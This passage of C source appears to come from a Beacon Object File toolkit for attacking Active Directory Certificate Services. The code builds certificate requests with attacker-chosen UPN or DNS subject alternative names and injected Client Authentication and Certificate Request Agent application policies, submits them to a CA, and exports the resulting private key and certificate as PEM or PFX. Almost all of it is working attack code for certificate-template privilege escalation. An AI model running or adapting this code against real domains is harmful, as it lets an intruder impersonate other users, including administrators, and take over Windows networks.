	if ( !IsNullOrEmptyW(bstrAltName) )
	{		
		// Format 1 - required for the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT scenario
		// Create an instance of the CAlternativeNames class with the IAlternativeNames interface
		SAFE_RELEASE(pAlternativeNames);
		hr = OLE32$CoCreateInstance(&CLSID_CAlternativeNames, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeNames, (LPVOID *)&(pAlternativeNames));
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CAlternativeNames)", hr);
		// Create an instance of the CX509ExtensionAlternativeNames class with the IX509ExtensionAlternativeNames interface
		SAFE_RELEASE(pExtensionAlternativeNames);
		hr = OLE32$CoCreateInstance(&CLSID_CX509ExtensionAlternativeNames, NULL, CLSCTX_INPROC_SERVER, &IID_IX509ExtensionAlternativeNames, (LPVOID *)&(pExtensionAlternativeNames));
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509ExtensionAlternativeNames)", hr);

		// Add UPN or DNS SAN
		// Create an instance of the CAlternativeName class with the IAlternativeName interface
		SAFE_RELEASE(pAlternativeName);
		hr = OLE32$CoCreateInstance(&CLSID_CAlternativeName, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeName, (LPVOID *)&(pAlternativeName));
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CAlternativeName)", hr);
		// Initialize the AlternativeName
		hr = pAlternativeName->lpVtbl->InitializeFromString(pAlternativeName, (dns) ? XCN_CERT_ALT_NAME_DNS_NAME : XCN_CERT_ALT_NAME_USER_PRINCIPLE_NAME, bstrAltName);
		CHECK_RETURN_FAIL("pAlternativeName->lpVtbl->InitializeFromString()", hr);
		// Add the AlternativeName to the collection of AlternativeNames
		hr = pAlternativeNames->lpVtbl->Add(pAlternativeNames, pAlternativeName);
		CHECK_RETURN_FAIL("pAlternativeNames->lpVtbl->Add()", hr);

		if ( !IsNullOrEmptyW(bstrAltUrl) )
		{
			// Add URL SAN
			// Create an instance of the CAlternativeName class with the IAlternativeName interface
			SAFE_RELEASE(pAlternativeName);
			hr = OLE32$CoCreateInstance(&CLSID_CAlternativeName, NULL, CLSCTX_INPROC_SERVER, &IID_IAlternativeName, (LPVOID *)&(pAlternativeName));
			CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CAlternativeName)", hr);
			// Initialize the AlternativeName
			hr = pAlternativeName->lpVtbl->InitializeFromString(pAlternativeName, XCN_CERT_ALT_NAME_URL, bstrAltUrl);
			CHECK_RETURN_FAIL("pAlternativeName->lpVtbl->InitializeFromString()", hr);
			// Add the AlternativeName to the collection of AlternativeNames
			hr = pAlternativeNames->lpVtbl->Add(pAlternativeNames, pAlternativeName);
			CHECK_RETURN_FAIL("pAlternativeNames->lpVtbl->Add()", hr);
		}

		// Initialize the X509ExtensionAlternativeNames collection from the AlternativeNames collection
		hr = pExtensionAlternativeNames->lpVtbl->InitializeEncode(pExtensionAlternativeNames, pAlternativeNames);
		CHECK_RETURN_FAIL("pExtensionAlternativeNames->lpVtbl->InitializeEncode()", hr);
		// Get the X509Extension interface of the X509ExtensionAlternativeNames
		SAFE_RELEASE(pExtension);
		hr = pExtensionAlternativeNames->lpVtbl->QueryInterface( pExtensionAlternativeNames, &IID_IX509Extension, (VOID **)&pExtension);
		CHECK_RETURN_FAIL("pExtensionAlternativeNames->lpVtbl->QueryInterface()", hr);
		// Get the collection of extensions included in the certificate request
		SAFE_RELEASE(pExtensions);
    	hr = (*lppCertificateRequestPkcs10V3)->lpVtbl->get_X509Extensions((*lppCertificateRequestPkcs10V3), &pExtensions);
    	CHECK_RETURN_FAIL("(*lppCertificateRequestPkcs10V3)->lpVtbl->get_X509Extensions()", hr);
		// Add the X509ExtensionAlternativeNames collection to the certificate request's collection of extensions
		hr = pExtensions->lpVtbl->Add(pExtensions, pExtension);
		CHECK_RETURN_FAIL("pExtensions->lpVtbl->Add()", hr);

		// Format 2 - required for the EDITF_ATTRIBUTESUBJECTALTNAME2 scenario
		// Create an instance of the CLSID_CX509NameValuePair class with the IID_IX509NameValuePair interface
		SAFE_RELEASE(pAltNameValuePair);
		hr = OLE32$CoCreateInstance(&CLSID_CX509NameValuePair, NULL, CLSCTX_INPROC_SERVER, &IID_IX509NameValuePair, (LPVOID *)&(pAltNameValuePair));
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509NameValuePair)", hr);
		// Create the AltNamePair Name
		SAFE_SYS_FREE(bstrAltNameValuePairName);
		bstrAltNameValuePairName = OLEAUT32$SysAllocString(L"SAN");
		// Create the AltNamePair Value
		MSVCRT$memset(swzAltNamePairValue,0,MAX_PATH*sizeof(WCHAR));
		if ( !IsNullOrEmptyW(bstrAltUrl) ) {
			MSVCRT$_snwprintf(swzAltNamePairValue, MAX_PATH - 1, L"%s:%s&url=%s", (dns) ? L"dns" : L"upn", bstrAltName, bstrAltUrl);
			swzAltNamePairValue[MAX_PATH - 1] = L'\0';
		}
		else {
			MSVCRT$_swprintf(swzAltNamePairValue, L"%s=%s",(dns) ? L"dns" : L"upn", bstrAltName);
		}
		SAFE_SYS_FREE(bstrAltNameValuePairValue);
		bstrAltNameValuePairValue = OLEAUT32$SysAllocString(swzAltNamePairValue);
		// Initialize the AltNamePair
        pAltNameValuePair->lpVtbl->Initialize(pAltNameValuePair, bstrAltNameValuePairName, bstrAltNameValuePairValue);
		// Get the collection of NameValuePairs included in the certificate request
		SAFE_RELEASE(pNameValuePairs);
    	hr = (*lppCertificateRequestPkcs10V3)->lpVtbl->get_NameValuePairs((*lppCertificateRequestPkcs10V3), &pNameValuePairs);
    	CHECK_RETURN_FAIL("(*lppCertificateRequestPkcs10V3)->lpVtbl->get_NameValuePairs()", hr);
		// Add the X509NameValuePair to the certificate request's collection of name value pairs
		hr = pNameValuePairs->lpVtbl->Add(pNameValuePairs, pAltNameValuePair);
		CHECK_RETURN_FAIL("pNameValuePairs->lpVtbl->Add()", hr);
	}
	if(addAppPolicy)
	{
		hr = objectId_POLICIES->lpVtbl->InitializeFromValue(objectId_POLICIES, OID_APP_CERT_POLICIES);
		CHECK_RETURN_FAIL(" objectId_ALLOW_CLIENT->lpVtbl->InitializeFromValu", hr);
		//First Check if the base extension is already there
		SAFE_RELEASE(pExtensions);
    	hr = (*lppCertificateRequestPkcs10V3)->lpVtbl->get_X509Extensions((*lppCertificateRequestPkcs10V3), &pExtensions);
    	CHECK_RETURN_FAIL("(*lppCertificateRequestPkcs10V3)->lpVtbl->get_X509Extensions()", hr);
		hr = pExtensions->lpVtbl->get_IndexByObjectId(pExtensions, objectId_POLICIES, &index);
		if(hr == S_OK)
		{
			hr = pExtensions->lpVtbl->get_ItemByIndex(pExtensions, index, (IX509Extension**)&pMSAppPolicies);
			CHECK_RETURN_FAIL("pExtensions->lpVtbl->get_ItemByIndex", hr);
			internal_printf("Found App Policy at index %d, removing it\n", index);
			hr = pExtensions->lpVtbl->Remove(pExtensions, index);
			CHECK_RETURN_FAIL("pExtensions->lpVtbl->Remove", hr);
		}
		internal_printf("Now Creating App policy\n");
		hr = OLE32$CoCreateInstance(&CLSID_CX509ExtensionMSApplicationPolicies, NULL, CLSCTX_INPROC_SERVER, &IID_IX509ExtensionMSApplicationPolicies, (LPVOID *)&pMSAppPolicies);
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509ExtensionMSApplicationPolicies)", hr);
		hr = OLE32$CoCreateInstance(&CLSID_CCertificatePolicies, NULL, CLSCTX_INPROC_SERVER, &IID_ICertificatePolicies, (LPVOID*)&certPolicies);
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CCertificatePolicies)", hr);
		hr = OLE32$CoCreateInstance(&CLSID_CCertificatePolicy, NULL, CLSCTX_INPROC_SERVER, &IID_ICertificatePolicy, (LPVOID*) &certPolicy);
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CCertificatePolicy)", hr);
		OID_APP_CERT_POLICY_ALLOW_CLIENT = OLEAUT32$SysAllocString(L"1.3.6.1.5.5.7.3.2");
		hr = objectId_ALLOW_CLIENT->lpVtbl->InitializeFromValue(objectId_ALLOW_CLIENT, OID_APP_CERT_POLICY_ALLOW_CLIENT);
		CHECK_RETURN_FAIL(" objectId_ALLOW_CLIENT->lpVtbl->InitializeFromValu", hr);
		SAFE_SYS_FREE(OID_APP_CERT_POLICY_ALLOW_CLIENT);
		hr = certPolicy->lpVtbl->Initialize(certPolicy, objectId_ALLOW_CLIENT);
		CHECK_RETURN_FAIL(" certPolicy->lpVtbl->Initialize", hr);
		hr = certPolicies->lpVtbl->Add(certPolicies, certPolicy);
		CHECK_RETURN_FAIL(" certPolicies->lpVtbl->Add", hr);
		//Cert Request
		hr = OLE32$CoCreateInstance(&CLSID_CCertificatePolicy, NULL, CLSCTX_INPROC_SERVER, &IID_ICertificatePolicy, (LPVOID*) &certPolicyReqAgent);
		CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CCertificatePolicy)", hr);
		hr = objectid_CERTAGENT->lpVtbl->InitializeFromValue(objectid_CERTAGENT, OID_APP_CERTAGENT);
		CHECK_RETURN_FAIL(" objectid_SMARTCARD->lpVtbl->InitializeFromValu", hr);
		SAFE_SYS_FREE(OID_APP_CERTAGENT);
		hr = certPolicyReqAgent->lpVtbl->Initialize(certPolicyReqAgent, objectid_CERTAGENT);
		CHECK_RETURN_FAIL(" certPolicy->lpVtbl->Initialize", hr);
		hr = certPolicies->lpVtbl->Add(certPolicies, certPolicyReqAgent);
		CHECK_RETURN_FAIL(" certPolicies->lpVtbl->Add", hr);
		hr = pMSAppPolicies->lpVtbl->InitializeEncode(pMSAppPolicies, certPolicies);
		CHECK_RETURN_FAIL("pMSAppPolicies->lpVtbl->InitializeEncode", hr);
		SAFE_RELEASE(pExtension);
		hr = pMSAppPolicies->lpVtbl->QueryInterface( pMSAppPolicies, &IID_IX509Extension, (VOID **)&pExtension);
		CHECK_RETURN_FAIL("pExtensionAlternativeNames->lpVtbl->QueryInterface()", hr);
		hr = pExtensions->lpVtbl->Add(pExtensions, pExtension);
		CHECK_RETURN_FAIL("pExtensions->lpVtbl->Add()", hr);
	}

	hr = S_OK;

fail:

	//saferelease all the objects
	SAFE_RELEASE(pNameValuePairs);
	SAFE_RELEASE(pAltNameValuePair);
	SAFE_SYS_FREE(bstrAltNameValuePairValue);
	SAFE_SYS_FREE(bstrAltNameValuePairName);
	SAFE_SYS_FREE(OID_APP_CERT_POLICY_ALLOW_CLIENT);
	SAFE_SYS_FREE(OID_APP_CERT_POLICIES);
	SAFE_SYS_FREE(OID_APP_CERTAGENT);
	SAFE_RELEASE(objectid_CERTAGENT);
	SAFE_RELEASE(objectId_POLICIES);
	SAFE_RELEASE(objectId_ALLOW_CLIENT);
	SAFE_RELEASE(pExtensions);
	SAFE_RELEASE(pExtension);
	SAFE_RELEASE(pMSAppPolicies);
	SAFE_RELEASE(certPolicies);
	SAFE_RELEASE(certPolicy);
	SAFE_RELEASE(certPolicyReqAgent);
	SAFE_RELEASE(pExtensionAlternativeNames);
	SAFE_RELEASE(pAlternativeNames);
	SAFE_RELEASE(pAlternativeName);
	SAFE_RELEASE(pDistinguishedName);

	return hr;
} // end _adcs_request_CreateCertRequest


HRESULT _adcs_request_CreateEnrollment(IX509CertificateRequestPkcs10V3 * pCertificateRequestPkcs10V3, IX509Enrollment ** lppEnrollment)
{
	HRESULT	hr = S_OK;
	
	IX509CertificateRequest * pCertificateRequest = NULL;

	CLSID CLSID_CX509Enrollment = { 0x884e2046, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	IID IID_IX509Enrollment = { 0x728ab346, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };

	IID IID_IX509CertificateRequest = { 0x728ab341, 0x217d, 0x11da, {0XB2, 0XA4, 0x00, 0x0E, 0x7B, 0xBB, 0x2B, 0x09} };
	HANDLE hFile = NULL;
	BSTR value;
	DWORD len = 0;
	// Create an instance of the CX509Enrollment class with the IX509Enrollment interface
	SAFE_RELEASE((*lppEnrollment));
	hr = OLE32$CoCreateInstance(&CLSID_CX509Enrollment, NULL, CLSCTX_INPROC_SERVER, &IID_IX509Enrollment, (LPVOID *)lppEnrollment);
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509Enrollment)", hr);
	
	SAFE_RELEASE(pCertificateRequest);
	hr = pCertificateRequestPkcs10V3->lpVtbl->QueryInterface(pCertificateRequestPkcs10V3, &IID_IX509CertificateRequest, (VOID **)&(pCertificateRequest));
	CHECK_RETURN_FAIL("pCertificateRequestPkcs10V3->lpVtbl->QueryInterface()", hr);

	// Initialize the enrollment object with the certificate request
	hr = (*lppEnrollment)->lpVtbl->InitializeFromRequest((*lppEnrollment), pCertificateRequest);
	CHECK_RETURN_FAIL("(*lppEnrollment)->lpVtbl->InitializeFromRequest()", hr);
	
	pCertificateRequestPkcs10V3->lpVtbl->Encode(pCertificateRequestPkcs10V3);
	pCertificateRequestPkcs10V3->lpVtbl->get_RawData(pCertificateRequestPkcs10V3, XCN_CRYPT_STRING_BASE64REQUESTHEADER, &value);
	hFile = KERNEL32$CreateFileA("debug.csr", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	len = OLEAUT32$SysStringLen(value);
	KERNEL32$WriteFile(hFile, value, len *2, NULL , NULL);
	KERNEL32$CloseHandle(hFile);
	hr = S_OK;

fail:

	SAFE_RELEASE(pCertificateRequest);

	return hr;
} 


HRESULT _adcs_request_SubmitEnrollment(IX509Enrollment * pEnrollment, BSTR bstrCA, BSTR * lpbstrCertificate)
{
	HRESULT	hr = S_OK;
	BSTR bstrEnrollmentRequest = NULL;
	ICertRequest2* pCertRequest2 = NULL;
	LONG pDisposition = 0;
	BSTR bstrDispositionMessage = NULL;
	LONG pRequestId = 0;

	CLSID CLSID_CCertRequest = { 0x98aff3f0, 0x5524, 0x11d0, {0X88, 0X12, 0x00, 0xa0, 0xc9, 0x03, 0xb8, 0x3c} };
	IID	IID_ICertRequest2 = { 0xA4772988, 0x4A85, 0x4FA9, {0x82, 0x4E, 0xB5, 0xCF, 0x5C, 0x16, 0x40, 0x5A} };

	// Create the enrollment request
	SAFE_SYS_FREE(bstrEnrollmentRequest);
	hr = pEnrollment->lpVtbl->CreateRequest(pEnrollment, XCN_CRYPT_STRING_BASE64, &bstrEnrollmentRequest);
	CHECK_RETURN_FAIL("pEnrollment->lpVtbl->CreateRequest()", hr);

	// Create an instance of the CCertRequest class with the ICertRequest2 interface
	SAFE_RELEASE(pCertRequest2);
	hr = OLE32$CoCreateInstance(&CLSID_CCertRequest, NULL, CLSCTX_INPROC_SERVER, &IID_ICertRequest2, (LPVOID *)&(pCertRequest2));
	CHECK_RETURN_FAIL("CoCreateInstance(CLSID_CX509CertificateRequestPkcs10)", hr);

	// Submit the cert request message to the CA
	hr = pCertRequest2->lpVtbl->Submit(pCertRequest2, CR_IN_BASE64 | CR_IN_FORMATANY, bstrEnrollmentRequest, NULL, bstrCA, &pDisposition);   
	CHECK_RETURN_FAIL("pCertRequest2->lpVtbl->Submit()", hr);

	// Get the request ID
	hr = pCertRequest2->lpVtbl->GetRequestId(pCertRequest2, &pRequestId);   
	CHECK_RETURN_FAIL("pCertRequest2->lpVtbl->GetRequestId()", hr);

	// Check the status of our request
	for( int nRetry = 0; (nRetry < CERT_REQUEST_RETRIES)&&(CR_DISP_UNDER_SUBMISSION==pDisposition); nRetry++ )
	{
		// Get the current disposition message
		SAFE_SYS_FREE(bstrDispositionMessage);
		hr = pCertRequest2->lpVtbl->GetDispositionMessage(pCertRequest2, &bstrDispositionMessage);
		CHECK_RETURN_FAIL("pCertRequest2->lpVtbl->GetDispositionMessage()", hr);
		
		// Check the current disposition
		switch(pDisposition)
		{
			case CR_DISP_ISSUED:
			{
				internal_printf("[*] CA Response   : The certificate had been issued.\n");
				break;
			}
			case CR_DISP_UNDER_SUBMISSION:
			{
				internal_printf("[*] CA Response   : The certificate is still pending: %S\n", bstrDispositionMessage);
				internal_printf("[*] Retry %d of %d. Sleeping %d seconds...\n", nRetry, CERT_REQUEST_RETRIES, CERT_REQUEST_TIMEOUT/1000);
				KERNEL32$Sleep(CERT_REQUEST_TIMEOUT);
				hr = pCertRequest2->lpVtbl->RetrievePending(pCertRequest2, pRequestId, bstrCA, &pDisposition);
				CHECK_RETURN_FAIL("pCertRequest2->lpVtbl->RetrievePending()", hr);
				break;
			}
			default:
			{
				pCertRequest2->lpVtbl->GetLastStatus(pCertRequest2, &hr);
				BeaconPrintf(CALLBACK_ERROR, "CA Response  : The submission failed: %S (0x%08lx)\n", bstrDispositionMessage, hr);
				goto fail;
			}
		} // end check of current disposition
	} // end for loop through retries
	
	if (CR_DISP_ISSUED != pDisposition)
	{
		hr = RPC_E_TIMEOUT;
		internal_printf("[*] CA Response   : Timed out: %d\n", pDisposition);
		goto fail;
	}

	hr = pCertRequest2->lpVtbl->GetCertificate(pCertRequest2, CR_OUT_BASE64, lpbstrCertificate);
	CHECK_RETURN_FAIL("pCertRequest2->lpVtbl->GetCertificate()", hr);

	hr = S_OK;

fail:

	SAFE_SYS_FREE(bstrDispositionMessage);
	SAFE_RELEASE(pCertRequest2);
	SAFE_SYS_FREE(bstrEnrollmentRequest);

	return hr;
} // end _adcs_request_SendCertRequestMessage


HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubject, LPCWSTR lpswzAltName, LPCWSTR lpswzAltUrl, LPCWSTR lpswzPfxPassword, BOOL bInstall, BOOL bMachine, BOOL addAppPolicy, BOOL dns, BOOL bPem)
{
	HRESULT	hr = S_OK;
	BSTR bstrCA = NULL;
	BSTR bstrTemplate = NULL;
	DWORD dwDistinguishedNameCount = 0;
	LPWSTR lpswzDistinguishedName = NULL;
	BSTR bstrSubject = NULL;
	BSTR bstrAltName = NULL;
	BSTR bstrAltUrl = NULL;
	BSTR bstrCertificate = NULL;
	IX509PrivateKey * pPrivateKey = NULL;
	IX509CertificateRequestPkcs10V3 * pCertificateRequestPkcs10V3 = NULL;
	IX509Enrollment * pEnrollment = NULL;
	
	// PEM export variables
	BSTR bstrExportType = NULL;
	BSTR bstrPrivateKey = NULL;
	DWORD dwPrivateKeyLen = 0;
	LPBYTE pPrivateDER = NULL;
	DWORD pemPrivateSize = 0;
	LPWSTR pPrivatePEM = NULL;
	
	// PFX export variables
	BSTR bstrContainerName = NULL;
	LPCWSTR wszPfxPassword = (lpswzPfxPassword && lpswzPfxPassword[0]) ? lpswzPfxPassword : L"";
	DWORD dwCertLen = 0;
	LPBYTE pbCertDER = NULL;
	PCCERT_CONTEXT pCertContext = NULL;
	PCCERT_CONTEXT pStoreCert = NULL;
	HCERTSTORE hMemStore = NULL;
	CRYPT_KEY_PROV_INFO keyProvInfo = {0};
	CRYPT_DATA_BLOB pfxBlob = {0};
	DWORD dwPfxB64Len = 0;
	LPSTR pszPfxB64 = NULL;

	// Get the Certificate Authority
	if (NULL == lpswzCA)
	{
		hr = E_INVALIDARG;
		BeaconPrintf(CALLBACK_ERROR, "lpswzCA is invalid\n");
		goto fail;
	}
	SAFE_SYS_FREE(bstrCA);
	bstrCA = OLEAUT32$SysAllocString(lpswzCA);

	// Get the template
	SAFE_SYS_FREE(bstrTemplate);

	bstrTemplate = OLEAUT32$SysAllocString(lpswzTemplate); 
	

	// Get the subject name
	SAFE_SYS_FREE(bstrSubject);
	if ( IsNullOrEmptyW(lpswzSubject) )
	{
		if (bMachine)
		{
			SECUR32$GetComputerObjectNameW(NameFullyQualifiedDN, lpswzDistinguishedName, &dwDistinguishedNameCount);
			lpswzDistinguishedName = intAlloc(dwDistinguishedNameCount * sizeof(WCHAR));
			CHECK_RETURN_NULL("intAlloc", lpswzDistinguishedName, hr);
			hr = SECUR32$GetComputerObjectNameW(NameFullyQualifiedDN, lpswzDistinguishedName, &dwDistinguishedNameCount);
			CHECK_RETURN_FALSE("SECUR32$GetComputerObjectNameW", hr);
		}
		else
		{
			SECUR32$GetUserNameExW(NameFullyQualifiedDN, lpswzDistinguishedName, &dwDistinguishedNameCount);
			lpswzDistinguishedName = intAlloc(dwDistinguishedNameCount * sizeof(WCHAR));
			CHECK_RETURN_NULL("intAlloc", lpswzDistinguishedName, hr);
			hr = SECUR32$GetUserNameExW(NameFullyQualifiedDN, lpswzDistinguishedName, &dwDistinguishedNameCount);
			CHECK_RETURN_FALSE("SECUR32$GetUserNameExW", hr);
		}
		bstrSubject = OLEAUT32$SysAllocString(lpswzDistinguishedName);
	}
	else { bstrSubject = OLEAUT32$SysAllocString(lpswzSubject); }

	// Get the alt name
	SAFE_SYS_FREE(bstrAltName);
	bstrAltName = OLEAUT32$SysAllocString(lpswzAltName);

	SAFE_SYS_FREE(bstrAltUrl);
	bstrAltUrl = OLEAUT32$SysAllocString(lpswzAltUrl);

	internal_printf("[*] CA            : %S\n", bstrCA);
	internal_printf("[*] Template      : %S\n", bstrTemplate);
	internal_printf("[*] Subject       : %S\n", bstrSubject);
	internal_printf("[*] AltName (%s) : %S\n", (dns) ? "dns" : "upn", (bstrAltName?bstrAltName:L"N/A"));
	internal_printf("[*] AltUrl        : %S\n", (bstrAltUrl?bstrAltUrl:L"N/A"));

	// Initialize COM
	hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
	if (hr == RPC_E_CHANGED_MODE || hr == S_FALSE) {
		hr = S_OK;
	}
	CHECK_RETURN_FAIL("[x] CoInitializeEx", hr);

	// Create the private key
	hr = _adcs_request_CreatePrivateKey(bMachine, &pPrivateKey);
	CHECK_RETURN_FAIL(L"[x] CreatePrivateKey", hr);

	// Get private key container name for PFX export
	hr = pPrivateKey->lpVtbl->get_UniqueContainerName(pPrivateKey, &bstrContainerName);
	CHECK_RETURN_FAIL("[x] pPrivateKey->get_UniqueContainerName", hr);

	// Create the cert request
	hr = _adcs_request_CreateCertRequest(bMachine, pPrivateKey, bstrTemplate, bstrSubject, bstrAltName, bstrAltUrl, &pCertificateRequestPkcs10V3, addAppPolicy, dns);
	CHECK_RETURN_FAIL(L"[x] CreatePrivateKey", hr);

	// Create enrollment
	hr = _adcs_request_CreateEnrollment(pCertificateRequestPkcs10V3, &pEnrollment);
	CHECK_RETURN_FAIL(L"[x] CreatePrivateKey", hr);

	// Submit the enrollment request
	hr = _adcs_request_SubmitEnrollment(pEnrollment, bstrCA, &bstrCertificate);
	CHECK_RETURN_FAIL(L"[x] SubmitEnrollment", hr);

	if (bPem) {
		// PEM output format
		bstrExportType = OLEAUT32$SysAllocString(BCRYPT_PRIVATE_KEY_BLOB);
		hr = pPrivateKey->lpVtbl->Export(pPrivateKey, bstrExportType, XCN_CRYPT_STRING_BINARY, &bstrPrivateKey);
		CHECK_RETURN_FAIL("pPrivateKey->Export()", hr);
		
		// Convert from BCRYPT_PRIVATE_KEY_BLOB to DER
		CRYPT32$CryptEncodeObjectEx(X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, PKCS_RSA_PRIVATE_KEY, (LPCVOID)bstrPrivateKey, 0, NULL, NULL, &dwPrivateKeyLen);
		pPrivateDER = (LPBYTE)intAlloc(dwPrivateKeyLen);
		CHECK_RETURN_NULL("intAlloc for private DER", pPrivateDER, hr);
		hr = CRYPT32$CryptEncodeObjectEx(X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, PKCS_RSA_PRIVATE_KEY, (LPCVOID)bstrPrivateKey, 0, NULL, (LPVOID)pPrivateDER, &dwPrivateKeyLen);
		CHECK_RETURN_FALSE("CryptEncodeObjectEx", hr);

		// Convert from DER to PEM format
		CRYPT32$CryptBinaryToStringW(pPrivateDER, dwPrivateKeyLen, CRYPT_STRING_BASE64, NULL, &pemPrivateSize);
		pPrivatePEM = (LPWSTR)intAlloc(pemPrivateSize * sizeof(WCHAR));
		CHECK_RETURN_NULL("intAlloc for private PEM", pPrivatePEM, hr);
		hr = CRYPT32$CryptBinaryToStringW(pPrivateDER, dwPrivateKeyLen, CRYPT_STRING_BASE64, pPrivatePEM, &pemPrivateSize);
		CHECK_RETURN_FALSE("CryptBinaryToStringW", hr);

		// Display the certificate in PEM format
		internal_printf("[*] cert.pem:\n");
		internal_printf("-----BEGIN RSA PRIVATE KEY-----\n");
		internal_printf("%S", pPrivatePEM);
		internal_printf("-----END RSA PRIVATE KEY-----\n");
		internal_printf("-----BEGIN CERTIFICATE-----\n");
		internal_printf("%S", bstrCertificate);
		internal_printf("-----END CERTIFICATE-----\n");
		internal_printf("[*] Convert with:\nopenssl pkcs12 -in cert.pem -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out cert.pfx\n");
	} else {
		// PFX output format
		// Decode certificate from BASE64 to DER (bstrCertificate is wide string)
		CRYPT32$CryptStringToBinaryW(bstrCertificate, 0, CRYPT_STRING_BASE64, NULL, &dwCertLen, NULL, NULL);
		pbCertDER = (LPBYTE)intAlloc(dwCertLen);
		CHECK_RETURN_NULL("intAlloc for cert DER", pbCertDER, hr);
		hr = CRYPT32$CryptStringToBinaryW(bstrCertificate, 0, CRYPT_STRING_BASE64, pbCertDER, &dwCertLen, NULL, NULL);
		CHECK_RETURN_FALSE("CryptStringToBinaryW", hr);

		// Create certificate context
		pCertContext = CRYPT32$CertCreateCertificateContext(X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, pbCertDER, dwCertLen);
		CHECK_RETURN_NULL("CertCreateCertificateContext", pCertContext, hr);

		// Create memory store
		hMemStore = CRYPT32$CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0, CERT_STORE_CREATE_NEW_FLAG, NULL);
		CHECK_RETURN_NULL("CertOpenStore", hMemStore, hr);

		// Add certificate to memory store
		hr = CRYPT32$CertAddCertificateContextToStore(hMemStore, pCertContext, CERT_STORE_ADD_ALWAYS, &pStoreCert);
		CHECK_RETURN_FALSE("CertAddCertificateContextToStore", hr);

		// Link private key to certificate
		keyProvInfo.pwszContainerName = bstrContainerName;
		keyProvInfo.pwszProvName = MS_ENHANCED_PROV_W;
		keyProvInfo.dwProvType = PROV_RSA_FULL;
		keyProvInfo.dwFlags = 0;
		keyProvInfo.dwKeySpec = AT_KEYEXCHANGE;

		hr = CRYPT32$CertSetCertificateContextProperty(pStoreCert, CERT_KEY_PROV_INFO_PROP_ID, 0, &keyProvInfo);
		CHECK_RETURN_FALSE("CertSetCertificateContextProperty", hr);

		// Export to PFX
		CRYPT32$PFXExportCertStoreEx(hMemStore, &pfxBlob, wszPfxPassword, NULL, EXPORT_PRIVATE_KEYS);
		if (pfxBlob.cbData > 0) {
			pfxBlob.pbData = (BYTE*)intAlloc(pfxBlob.cbData);
			CHECK_RETURN_NULL("intAlloc for PFX", pfxBlob.pbData, hr);
			
			hr = CRYPT32$PFXExportCertStoreEx(hMemStore, &pfxBlob, wszPfxPassword, NULL, EXPORT_PRIVATE_KEYS);
			CHECK_RETURN_FALSE("PFXExportCertStoreEx", hr);

			// Convert PFX to BASE64
			CRYPT32$CryptBinaryToStringA(pfxBlob.pbData, pfxBlob.cbData, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &dwPfxB64Len);
			pszPfxB64 = (LPSTR)intAlloc(dwPfxB64Len + 1);
			CHECK_RETURN_NULL("intAlloc for PFX B64", pszPfxB64, hr);
			CRYPT32$CryptBinaryToStringA(pfxBlob.pbData, pfxBlob.cbData, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, pszPfxB64, &dwPfxB64Len);

			internal_printf("[*] cert.pfx (password: '%S'):\n\n%s\n", wszPfxPassword, pszPfxB64);
		}
	}

	// Install the certificate?
	if (bInstall)
	{
		hr = pEnrollment->lpVtbl->InstallResponse(pEnrollment, AllowUntrustedRoot, bstrCertificate, XCN_CRYPT_STRING_BASE64, NULL);
		CHECK_RETURN_FAIL("pEnrollment->lpVtbl->InstallResponse()", hr);

		internal_printf("[*] Certificate installed!\n");
	}

	hr = S_OK;

fail:
	// PEM cleanup
	SAFE_INT_FREE(pPrivateDER);
	SAFE_INT_FREE(pPrivatePEM);
	SAFE_SYS_FREE(bstrPrivateKey);
	SAFE_SYS_FREE(bstrExportType);
	// PFX cleanup
	SAFE_INT_FREE(pszPfxB64);
	if (pfxBlob.pbData) intFree(pfxBlob.pbData);
	if (pStoreCert) CRYPT32$CertFreeCertificateContext(pStoreCert);
	if (pCertContext) CRYPT32$CertFreeCertificateContext(pCertContext);
	if (hMemStore) CRYPT32$CertCloseStore(hMemStore, 0);
	SAFE_INT_FREE(pbCertDER);
	// Common cleanup
	SAFE_RELEASE(pEnrollment);
	SAFE_RELEASE(pCertificateRequestPkcs10V3);
	SAFE_RELEASE(pPrivateKey);
	SAFE_SYS_FREE(bstrContainerName);
	SAFE_SYS_FREE(bstrCertificate);
	SAFE_SYS_FREE(bstrAltName);
	SAFE_SYS_FREE(bstrAltUrl);
	SAFE_SYS_FREE(bstrSubject);
	SAFE_INT_FREE(lpswzDistinguishedName);
	SAFE_SYS_FREE(bstrTemplate);
	SAFE_SYS_FREE(bstrCA);

	OLE32$CoUninitialize();

	return hr;
} // end adcs_request


================================================
FILE: AD-BOF/ADCS-BOF/src/request/adcs_request.h
================================================
#pragma once
#define WIN32_WINNT 0x0601
#include <windows.h>
#include "CertCli.h"     // from /mnt/hgfs/git/external/winsdk-10/Include/10.0.16299.0/um
#include "CertPol.h"     // from /mnt/hgfs/git/external/winsdk-10/Include/10.0.16299.0/um
#include "certenroll.h"  // from /mnt/hgfs/git/external/winsdk-10/Include/10.0.16299.0/um

HRESULT _adcs_request_CreatePrivateKey(BOOL bMachine, IX509PrivateKey ** lppPrivateKey);
